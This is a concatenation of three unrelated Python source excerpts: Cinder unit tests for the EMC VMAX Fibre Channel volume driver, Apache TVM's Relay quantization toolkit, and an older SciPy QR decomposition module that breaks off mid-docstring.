self.driver.create_cloned_volume,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
def test_migrate_volume_no_fast_success(self, _mock_volume_type):
self.driver.migrate_volume(self.data.test_ctxt, self.data.test_volume,
self.data.test_host)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'parse_pool_instance_id',
return_value=('silver', 'SYMMETRIX+000195900551'))
def test_retype_volume_no_fast_success(
self, _mock_volume_type, mock_values):
self.driver.retype(
self.data.test_ctxt, self.data.test_volume, self.data.new_type,
self.data.diff, self.data.test_host)
def _cleanup(self):
bExists = os.path.exists(self.config_file_path)
if bExists:
os.remove(self.config_file_path)
shutil.rmtree(self.tempdir)
class EMCVMAXFCDriverFastTestCase(test.TestCase):
def setUp(self):
self.data = EMCVMAXCommonData()
self.tempdir = tempfile.mkdtemp()
super(EMCVMAXFCDriverFastTestCase, self).setUp()
self.config_file_path = None
self.create_fake_config_file_fast()
self.addCleanup(self._cleanup)
configuration = mock.Mock()
configuration.cinder_emc_config_file = self.config_file_path
configuration.safe_get.return_value = 'FCFAST'
configuration.config_group = 'FCFAST'
self.stubs.Set(EMCVMAXCommon, '_get_ecom_connection',
self.fake_ecom_connection)
instancename = FakeCIMInstanceName()
self.stubs.Set(EMCVMAXUtils, 'get_instance_name',
instancename.fake_getinstancename)
self.stubs.Set(time, 'sleep',
self.fake_sleep)
driver = EMCVMAXFCDriver(configuration=configuration)
driver.db = FakeDB()
self.driver = driver
def create_fake_config_file_fast(self):
doc = Document()
emc = doc.createElement("EMC")
doc.appendChild(emc)
fastPolicy = doc.createElement("FastPolicy")
fastPolicyText = doc.createTextNode("GOLD1")
emc.appendChild(fastPolicy)
fastPolicy.appendChild(fastPolicyText)
ecomserverip = doc.createElement("EcomServerIp")
ecomserveriptext = doc.createTextNode("1.1.1.1")
emc.appendChild(ecomserverip)
ecomserverip.appendChild(ecomserveriptext)
ecomserverport = doc.createElement("EcomServerPort")
ecomserverporttext = doc.createTextNode("10")
emc.appendChild(ecomserverport)
ecomserverport.appendChild(ecomserverporttext)
ecomusername = doc.createElement("EcomUserName")
ecomusernametext = doc.createTextNode("user")
emc.appendChild(ecomusername)
ecomusername.appendChild(ecomusernametext)
ecompassword = doc.createElement("EcomPassword")
ecompasswordtext = doc.createTextNode("pass")
emc.appendChild(ecompassword)
ecompassword.appendChild(ecompasswordtext)
portgroup = doc.createElement("PortGroup")
portgrouptext = doc.createTextNode("myPortGroup")
portgroup.appendChild(portgrouptext)
pool = doc.createElement("Pool")
pooltext = doc.createTextNode("gold")
emc.appendChild(pool)
pool.appendChild(pooltext)
array = doc.createElement("Array")
arraytext = doc.createTextNode("0123456789")
emc.appendChild(array)
array.appendChild(arraytext)
portgroups = doc.createElement("PortGroups")
portgroups.appendChild(portgroup)
emc.appendChild(portgroups)
timeout = doc.createElement("Timeout")
timeouttext = doc.createTextNode("0")
emc.appendChild(timeout)
timeout.appendChild(timeouttext)
filename = 'cinder_emc_config_FCFAST.xml'
self.config_file_path = self.tempdir + '/' + filename
f = open(self.config_file_path, 'w')
doc.writexml(f)
f.close()
def fake_ecom_connection(self):
conn = FakeEcomConnection()
return conn
def fake_sleep(self, seconds):
return
@mock.patch.object(
EMCVMAXCommon,
'_find_storageSystem',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'is_tiering_policy_enabled',
return_value=True)
@mock.patch.object(
EMCVMAXFast,
'get_tier_policy_by_name',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'get_capacities_associated_to_policy',
return_value=(1234, 1200))
@mock.patch.object(
EMCVMAXUtils,
'parse_array_name_from_file',
return_value="123456789")
def test_get_volume_stats_fast(self,
mock_storage_system,
mock_is_fast_enabled,
mock_get_policy,
mock_capacity,
mock_array):
self.driver.get_volume_stats(True)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_create_volume_fast_success(
self, _mock_volume_type, mock_storage_system, mock_pool_policy):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'storagetype: stripedmetacount': '4',
'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_create_volume_fast_striped_success(
self, _mock_volume_type, mock_storage_system, mock_pool_policy):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
def test_delete_volume_fast_success(self, _mock_volume_type,
mock_storage_group):
self.driver.delete_volume(self.data.test_volume)
def test_create_volume_fast_failed(self):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume,
self.data.test_failed_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
def test_delete_volume_fast_notfound(self, _mock_volume_type):
"""We do not set the provider location.
"""
notfound_delete_vol = {}
notfound_delete_vol['name'] = 'notfound_delete_vol'
notfound_delete_vol['id'] = '10'
notfound_delete_vol['CreationClassName'] = 'Symmm_StorageVolume'
notfound_delete_vol['SystemName'] = self.data.storage_system
notfound_delete_vol['DeviceID'] = notfound_delete_vol['id']
notfound_delete_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
name = {}
name['classname'] = 'Symm_StorageVolume'
keys = {}
keys['CreationClassName'] = notfound_delete_vol['CreationClassName']
keys['SystemName'] = notfound_delete_vol['SystemName']
keys['DeviceID'] = notfound_delete_vol['DeviceID']
keys['SystemCreationClassName'] =\
notfound_delete_vol['SystemCreationClassName']
name['keybindings'] = keys
notfound_delete_vol['volume_type_id'] = 'abc'
notfound_delete_vol['provider_location'] = None
self.driver.delete_volume(notfound_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_delete_volume_fast_failed(
self, _mock_volume_type, mock_wrapper,
mock_storage_system, mock_pool_policy):
self.driver.create_volume(self.data.failed_delete_vol)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_volume,
self.data.failed_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'hostlunid': 1,
'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_fast_success(self, _mock_volume_type, mock_wrap_group,
mock_wrap_device):
self.driver.initialize_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_fast_failed(self, mock_wrap_group, mock_wrap_device):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.initialize_connection,
self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_fast_success(self, mock_volume_type,
mock_storage_group):
self.driver.terminate_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils, 'find_storage_system',
return_value={'Name': EMCVMAXCommonData.storage_system})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_fast_last_volume_success(
self, mock_volume_type,
mock_storage_system, mock_storage_group):
self.driver.terminate_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils,
'get_volume_size',
return_value='2147483648')
def test_extend_volume_fast_success(self, _mock_volume_type,
_mock_volume_size):
newSize = '2'
self.driver.extend_volume(self.data.test_volume, newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils,
'check_if_volume_is_concatenated',
return_value='False')
def test_extend_volume_striped_fast_failed(self, _mock_volume_type,
_mock_is_concatenated):
newSize = '2'
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
self.data.test_volume,
newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_snapshot_fast_success(self, mock_volume_type,
mock_storage_group, mock_volume,
mock_sync_sv,
mock_storage_config_service,
mock_controller_config_service,
mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_snapshot(self.data.test_volume)
def test_create_snapshot_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_snapshot,
self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_volume_from_snapshot_fast_success(
self, mock_volume_type, mock_storage_group, mock_volume,
mock_sync_sv, mock_storage_config_service,
mock_controller_config_service, mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_volume_from_snapshot(
self.data.test_volume, EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'storagetype: pool': 'gold',
'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils,
'find_replication_service',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_volume_from_snapshot_fast_failed(self, mock_volume_type,
mock_rep_service,
mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume_from_snapshot,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_clone_fast_success(self, mock_volume_type,
mock_storage_group, mock_volume,
mock_sync_sv,
mock_storage_config_service,
mock_controller_config_service,
mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_cloned_volume(self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils,
'find_replication_service',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_clone_fast_failed(self, mock_volume_type,
mock_rep_service, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_cloned_volume,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
def test_migrate_volume_fast_success(self, _mock_volume_type):
self.driver.migrate_volume(self.data.test_ctxt, self.data.test_volume,
self.data.test_host)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils,
'parse_pool_instance_id',
return_value=('silver', 'SYMMETRIX+000195900551'))
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
def test_retype_volume_fast_success(
self, _mock_volume_type, mock_values, mock_wrap):
self.driver.retype(
self.data.test_ctxt, self.data.test_volume, self.data.new_type,
self.data.diff, self.data.test_host)
def _cleanup(self):
bExists = os.path.exists(self.config_file_path)
if bExists:
os.remove(self.config_file_path)
shutil.rmtree(self.tempdir)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#pylint: disable=unused-argument
"""Automatic quantization toolkit."""
from __future__ import absolute_import
import numpy as np
from . import _quantize
from .. import expr as _expr
from .. import module as _module
from .. import analysis as _analysis
from .. import transform as _transform
from .. import op as _op
from ... import make as _make
from ..base import NodeBase, register_relay_node
class QAnnotateKind(object):
"""Denote the kind of annotation field, corresponding
to different nbit configure."""
IDENTITY = 0
INPUT = 1
WEIGHT = 2
ACTIVATION = 3
def kind2str(kind):
"""Convert a `QAnnotateKind` to string"""
str_map = {
QAnnotateKind.INPUT: "input",
QAnnotateKind.WEIGHT: "weight",
QAnnotateKind.ACTIVATION: "activation",
QAnnotateKind.IDENTITY: "identity"
}
assert kind in str_map
return str_map[kind]
def _forward_op(ref_call, args):
"""forward the operator of ref_call with provided arguments"""
return _expr.Call(
ref_call.op, args, ref_call.attrs, ref_call.type_args)
@register_relay_node("relay.quantize.QConfig")
class QConfig(NodeBase):
"""Configure the quantization behavior by setting config variables.
Note
----
This object is backed by node system in C++, with arguments that can be
exchanged between python and C++.
Do not construct directly, use qconfig instead.
The fields that are backed by the C++ node are immutable once an instance
is constructed. See _node_defaults for the fields.
"""
_node_defaults = {
"nbit_input": 8,
"nbit_weight": 8,
"nbit_activation": 32,
"dtype_input": "int8",
"dtype_weight": "int8",
"dtype_activation": "int32",
"global_scale": 8.0,
"skip_conv_layers": [0],
"do_simulation": False,
"round_for_shift": True,
"debug_enabled_ops": None,
}
# pylint: disable=no-member
def __init__(self, handle):
"""Initialize the function with handle
Parameters
----------
handle : SymbolHandle
the handle to the underlying C++ Symbol
"""
super(QConfig, self).__init__(handle)
self.handle = handle
def guard(self, ref_call):
"""Return true if op is enabled, otherwise return false"""
op_name = ref_call.op.name
if self.debug_enabled_ops is not None:
name_list = [x.value for x in self.debug_enabled_ops]
if op_name not in name_list:
return False
return True
def get_nbit_by_kind(self, kind):
name = kind2str(kind)
return getattr(self, 'nbit_' + name)
def get_dtype_by_kind(self, kind):
name = kind2str(kind)
return getattr(self, 'dtype_' + name)
def __enter__(self):
# pylint: disable=protected-access
_quantize._EnterQConfigScope(self)
return self
def __exit__(self, ptype, value, trace):
_quantize._ExitQConfigScope(self)
def __setattr__(self, name, value):
if name in QConfig._node_defaults:
raise AttributeError(
"'%s' object cannot set attribute '%s'" % (str(type(self)), name))
return super(QConfig, self).__setattr__(name, value)
def current_qconfig():
"""Get the current quantization configuration."""
return _quantize._GetCurrentQConfig()
def qconfig(**kwargs):
"""Configure the quantization behavior by setting config variables.
Parameters
---------
nbit_dict: dict of QAnnotateKind -> int
Number of bit for every kind of annotate field.
global_scale: float
The global scale for calibration.
skip_conv_layers: list
Specifying which layers to be skipped. Provide a list of indices
that indicate which conv2d layers to leave untouched. Start from 0.
do_simulation: boolean
Whether to do simulation with float operation only.
round_for_shift: boolean
Whether to add bias for rounding during shift.
debug_enabled_ops: None or list of str
Partially quantize specified operators for debugging. The default value
is None, which means will try to call all operartors' annotate rewrite
function.
Returns
-------
config: QConfig
The quantization configuration
"""
node_args = {k: v if k not in kwargs else kwargs[k]
for k, v in QConfig._node_defaults.items()}
return _make.node("relay.quantize.QConfig", **node_args)
class QuantizeContext(object):
"""An internal used global context object for annotation,
for putting some state variables like `conv2d_counter`."""
Current = None
def __init__(self):
self.qnode_map = dict()
self._conv2d_counter = 0
self._stop_quantize = False
def check_to_skip(self, ref_call):
"""Check the index of conv2d layer to decide whether to
skip the current operator."""
if self._stop_quantize:
return True
if current_qconfig().skip_conv_layers is not None:
# check skip conv layers
skipped_indices = [int(x) for x in current_qconfig().skip_conv_layers]
if self._conv2d_counter in skipped_indices:
if ref_call.op.name == 'nn.conv2d':
self._conv2d_counter += 1
return True
if ref_call.op.name == 'nn.conv2d':
self._conv2d_counter += 1
return False
def stop_quantize(self):
self._stop_quantize = True
def reset(self):
self._conv2d_counter = 0
self._stop_quantize = False
def __enter__(self):
self.reset()
return self
def __exit__(self, ptype, value, traceback):
pass
def quantize_context():
"""Get the global singleton scope"""
if QuantizeContext.Current is None:
QuantizeContext.Current = QuantizeContext()
return QuantizeContext.Current
def partition():
"""Partition graph into small low-precision sections by `cast_hint` and
`stop_fusion`.
Returns
-------
ret: tvm.relay.Pass
The registered pass for VTA rewrite.
"""
return _quantize.QuantizePartition()
def annotate():
"""Given a float32 graph, this pass will rewrite the graph and return
a graph which simulates the error brought by the current quantization
scheme.
Returns
-------
ret: tvm.relay.Pass
The registered pass for quantization annotation.
"""
return _quantize.QuantizeAnnotate()
def collect_stats(graph):
"""Given an annotated graph, create a profile graph to collect profile data from the
calibration dataset. This pass collects simulated_quantize op input into a tuple.
Simulated_quantize ops are rewritten to identity mode. The tuple is the output of the profile
graph.
Parameters
----------
graph: Function
The simulation graph after annotation.
Returns
-------
ret: Function
The profile graph which outputs a tuple of profile data.
"""
return _quantize.CollectStats(graph)
def calibrate(graph, mod=None, ctx=None, weight_scales='power2', scales=None):
"""The calibrate procedure will try to calculate the content of
dom_scale, nbit, clip_min, clip_max for every `simulated_quantize`
operator.
Parameters
---------
graph: Function
The simulation graph after annotation.
mod: tvm.relay.Module
The module where calibration happens on.
ctx: tvm.relay.PassContext
The pass context used for calibration.
weight_scales: 'power2' or 'max'.
The way to calculate scales for weights (annotated with QAnnotateKind.WEIGHT).
power2: Find the maximum of the absolute value of the tensor, and then round up to power
of two.
max: Find the maximum of the absolute value of the tensor.
scales: List[float]
Pre-calculated scales for input and activations. Length and the order of elements of the
scales list should match the output tuple of the profile graph created by collect_stats.
Returns
-------
ret: Function
The graph after calibration
"""
def power2_scale(arr):
"""calculate weight scale with nearest mode-2 scale"""
val = np.amax(np.abs(arr.asnumpy()))
return 2**np.math.ceil(np.math.log(val, 2)) if val > 0 else 1.0
def max_scale(arr):
"""calculate weight scale with maximum absolute value"""
val = np.amax(np.abs(arr.asnumpy()))
return val
scale_idx = 0
cfg = current_qconfig()
const_params = {}
quantize_op = _op.get("relay.op.annotation.simulated_quantize")
def visit_func(expr):
"""Internal visit function"""
nonlocal scale_idx
if isinstance(expr, _expr.Call) and expr.op == quantize_op:
_, ndom_scale, nclip_min, nclip_max = expr.args
attrs = expr.attrs
kind = attrs.kind
nbit = cfg.get_nbit_by_kind(kind)
valid_bit = nbit - attrs.sign
if kind in [QAnnotateKind.WEIGHT]:
if all([isinstance(arg, _expr.Constant)
for arg in [ndom_scale, nclip_min, nclip_max]]):
return
var = expr.args[0]
assert isinstance(var, _expr.Constant)
if weight_scales == 'max':
scale = max_scale(var.data)
elif weight_scales == 'power2':
scale = power2_scale(var.data)
else:
raise ValueError('{} not supported'.format(weight_scales))
elif scales is not None:
scale = scales[scale_idx]
scale_idx += 1
else:
scale = cfg.global_scale
def _make_const(val):
return _expr.const(val, 'float32')
valid_range = 2**valid_bit
const_params[ndom_scale] = _make_const(scale / valid_range)
const_params[nclip_min] = _make_const(- (valid_range - 1))
const_params[nclip_max] = _make_const((valid_range - 1))
_analysis.post_order_visit(graph, visit_func)
ret = _expr.bind(graph, const_params)
return ret
def realize():
"""The realize pass will transform the simulated quantized graph, which
actually computes with float32, to a real low-bit integer graph. It will
replace the `simulated_quantize` with several fine-grained operators like
add, multiply, and shift as much as possible for better performance.
Returns
-------
ret: tvm.relay.Pass
The registered pass for quantization realization.
"""
return _quantize.QuantizeRealize()
def _bind_params(func, params):
"""Bind the params to the expression.
"""
name_dict = {}
for arg in func.params:
name = arg.name_hint
if name in name_dict:
name_dict[name] = None
else:
name_dict[name] = arg
bind_dict = {}
for k, v in params.items():
if k not in name_dict:
continue
arg = name_dict[k]
if arg is None:
raise ValueError("Multiple args in the function have name %s" % k)
bind_dict[arg] = _expr.const(v)
return _expr.bind(func, bind_dict)
def prerequisite_optimize(graph, params=None):
""" Prerequisite optimization passes for quantization. Perform
"SimplifyInference", "FoldScaleAxis", "FoldConstant", and
"CanonicalizeOps" optimization before quantization. """
optimize = _transform.Sequential([_transform.SimplifyInference(),
_transform.FoldConstant(),
_transform.FoldScaleAxis(),
_transform.CanonicalizeOps(),
_transform.FoldConstant()])
if params:
graph = _bind_params(graph, params)
mod = _module.Module.from_expr(graph)
with _transform.PassContext(opt_level=3):
mod = optimize(mod)
return mod["main"]
def quantize(graph, params=None, dataset=None):
""" The quantization procedure. Before running the three main
procedure of quantization, "annotate", "calibrate" and "realize"
, we need to do "SimplifyInference", "FoldScaleAxis", "FoldConstant"
first for optimizing.
Parameters
---------
graph: Function
The original graph.
params : dict of str to NDArray
Input parameters to the graph that do not change
during inference time. Used for constant folding.
dataset: list of dict of Var -> NDArray
The calibration dataset.
Returns
-------
ret: Function
The graph after quantization
"""
graph = prerequisite_optimize(graph, params)
mod = _module.Module.from_expr(graph)
calibrate_pass = _transform.function_pass(calibrate, opt_level=1,
name="QuantizeCalibrate")
quant_passes = [partition(),
annotate(),
calibrate_pass]
if not current_qconfig().do_simulation:
quant_passes.append(realize())
quant_passes.append(_transform.FoldConstant())
quantize_seq = _transform.Sequential(quant_passes)
with _transform.PassContext(opt_level=3,
required_pass=["QuantizeAnnotate",
"QuantizeCalibrate",
"QuantizeRealize"]):
with quantize_context():
mod = quantize_seq(mod)
return mod["main"]
|
|
"""QR decomposition functions."""
import numpy
from numpy import asarray_chkfinite
# Local imports
import special_matrices
from blas import get_blas_funcs
from lapack import get_lapack_funcs, find_best_lapack_type
from misc import _datacopied
def qr(a, overwrite_a=False, lwork=None, mode='full'):
"""Compute QR decomposition of a matrix.
Calculate the decomposition :lm:`A = Q R` where Q is unitary/orthogonal
and R upper triangular.
Parameters
----------
a : array, shape (M, N)
Matrix to be decomposed
overwrite_a : bool, optional
Whether data in a is overwritten (may improve performance)
lwork : int, optional
Work array size, lwork >= a.shape[1]. If None or -1, an optimal size
is computed.
mode : {'full', 'r', 'economic'}
Determines what information is to be returned: either both Q and R
('full', default), only R ('r') or both Q and R but computed in
economy-size ('economic', see Notes).
Returns
-------
Q : double or complex ndarray
Of shape (M, M), or (M, K) for ``mode='economic'``. Not returned if
``mode='r'``.
R : double or complex ndarray
Of shape (M, N), or (K, N) for ``mode='economic'``. ``K = min(M, N)``.
Raises LinAlgError if decomposition fails
Notes
-----
This is an interface to the LAPACK routines dgeqrf, zgeqrf,
dorgqr, and zungqr.
If ``mode=economic``, the shapes of Q and R are (M, K) and (K, N) instead
of (M,M) and (M,N), with ``K=min(M,N)``.
Examples
--------
>>> from scipy import random, linalg, dot, allclose
>>> a = random.randn(9, 6)
>>> q, r = linalg.qr(a)
>>> allclose(a, dot(q, r))
True
>>> q.shape, r.shape
((9, 9), (9, 6))
>>> r2 = linalg.qr(a, mode='r')
>>> allclose(r, r2)
True
>>> q3, r3 = linalg.qr(a, mode='economic')
>>> q3.shape, r3.shape
((9, 6), (6, 6))
"""
if mode == 'qr':
# 'qr' was the old default, equivalent to 'full'. Neither 'full' nor
# 'qr' are used below, but set to 'full' anyway to be sure
mode = 'full'
if not mode in ['full', 'qr', 'r', 'economic']:
raise ValueError(\
"Mode argument should be one of ['full', 'r', 'economic']")
a1 = asarray_chkfinite(a)
if len(a1.shape) != 2:
raise ValueError("expected 2D array")
M, N = a1.shape
overwrite_a = overwrite_a or (_datacopied(a1, a))
geqrf, = get_lapack_funcs(('geqrf',), (a1,))
if lwork is None or lwork == -1:
# get optimal work array
qr, tau, work, info = geqrf(a1, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
qr, tau, work, info = geqrf(a1, lwork=lwork, overwrite_a=overwrite_a)
if info < 0:
raise ValueError("illegal value in %d-th argument of internal geqrf"
% -info)
if not mode == 'economic' or M < N:
R = special_matrices.triu(qr)
else:
R = special_matrices.triu(qr[0:N, 0:N])
if mode == 'r':
return R
if find_best_lapack_type((a1,))[0] in ('s', 'd'):
gor_un_gqr, = get_lapack_funcs(('orgqr',), (qr,))
else:
gor_un_gqr, = get_lapack_funcs(('ungqr',), (qr,))
if M < N:
# get optimal work array
Q, work, info = gor_un_gqr(qr[:,0:M], tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_gqr(qr[:,0:M], tau, lwork=lwork, overwrite_a=1)
elif mode == 'economic':
# get optimal work array
Q, work, info = gor_un_gqr(qr, tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_gqr(qr, tau, lwork=lwork, overwrite_a=1)
else:
t = qr.dtype.char
qqr = numpy.empty((M, M), dtype=t)
qqr[:,0:N] = qr
# get optimal work array
Q, work, info = gor_un_gqr(qqr, tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_gqr(qqr, tau, lwork=lwork, overwrite_a=1)
if info < 0:
raise ValueError("illegal value in %d-th argument of internal gorgqr"
% -info)
return Q, R
def qr_old(a, overwrite_a=False, lwork=None):
"""Compute QR decomposition of a matrix.
Calculate the decomposition :lm:`A = Q R` where Q is unitary/orthogonal
and R upper triangular.
Parameters
----------
a : array, shape (M, N)
Matrix to be decomposed
overwrite_a : boolean
Whether data in a is overwritten (may improve performance)
lwork : integer
Work array size, lwork >= a.shape[1]. If None or -1, an optimal size
is computed.
Returns
-------
Q : double or complex array, shape (M, M)
R : double or complex array, shape (M, N)
Size K = min(M, N)
Raises LinAlgError if decomposition fails
"""
a1 = asarray_chkfinite(a)
if len(a1.shape) != 2:
raise ValueError('expected matrix')
M,N = a1.shape
overwrite_a = overwrite_a or (_datacopied(a1, a))
geqrf, = get_lapack_funcs(('geqrf',), (a1,))
if lwork is None or lwork == -1:
# get optimal work array
qr, tau, work, info = geqrf(a1, lwork=-1, overwrite_a=1)
lwork = work[0]
qr, tau, work, info = geqrf(a1, lwork=lwork, overwrite_a=overwrite_a)
if info < 0:
raise ValueError('illegal value in %d-th argument of internal geqrf'
% -info)
gemm, = get_blas_funcs(('gemm',), (qr,))
t = qr.dtype.char
R = special_matrices.triu(qr)
Q = numpy.identity(M, dtype=t)
ident = numpy.identity(M, dtype=t)
zeros = numpy.zeros
for i in range(min(M, N)):
v = zeros((M,), t)
v[i] = 1
v[i+1:M] = qr[i+1:M, i]
H = gemm(-tau[i], v, v, 1, ident, trans_b=2)
Q = gemm(1, Q, H)
return Q, R
def rq(a, overwrite_a=False, lwork=None, mode='full'):
"""Compute RQ decomposition of a square real matrix.
Calculate the decomposition :lm:`A = R Q` where Q is unitary/orthogonal
and R upper triangular.
Parameters
----------
a : array, shape (M, M)
